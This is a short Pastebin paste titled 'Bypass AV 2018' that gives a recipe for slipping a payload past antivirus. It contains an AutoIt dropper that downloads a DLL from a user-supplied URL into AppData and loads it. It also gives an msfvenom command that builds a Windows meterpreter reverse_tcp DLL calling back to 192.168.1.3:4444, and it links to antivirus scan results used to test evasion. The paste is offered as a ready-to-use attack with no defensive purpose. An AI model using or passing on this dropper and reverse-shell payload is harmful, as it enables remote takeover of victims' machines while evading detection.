anhkiet2507

Bypass AV 2018

Feb 6th, 2018
36,940
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.55 KB | None | 0 0
  1. Download Auto-IT: https://www.autoitscript.com/site/autoit/downloads/
  2. Build Code:
  3. ;CODE BY BINPC X-GROUPS TEAM
  4. $url="Nhap Url cua ban vao day"
  5. InetGet($url,@AppDataDir&"\ten file.dll",0)
  6. $hDll = DllOpen(@AppDataDir & "\ten file.dll")
  7. DllClose($hDll)
  8. Generate .dll Payload Code:
  9. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f dll -o ltvn.dll
  10. AV Scan Test:
  11. https://www.virustotal.com/#/file/0e954d4b4047792da5d497a830eb5b5b28d0f6e5d699b8dd9c9bbd4b4a08ddf2/detection
  12. https://nodistribute.com/result/eaCxAgD5B8QL36FyoZOrl7k0c2i4
Advertisement
Add Comment
Please, Sign In to add comment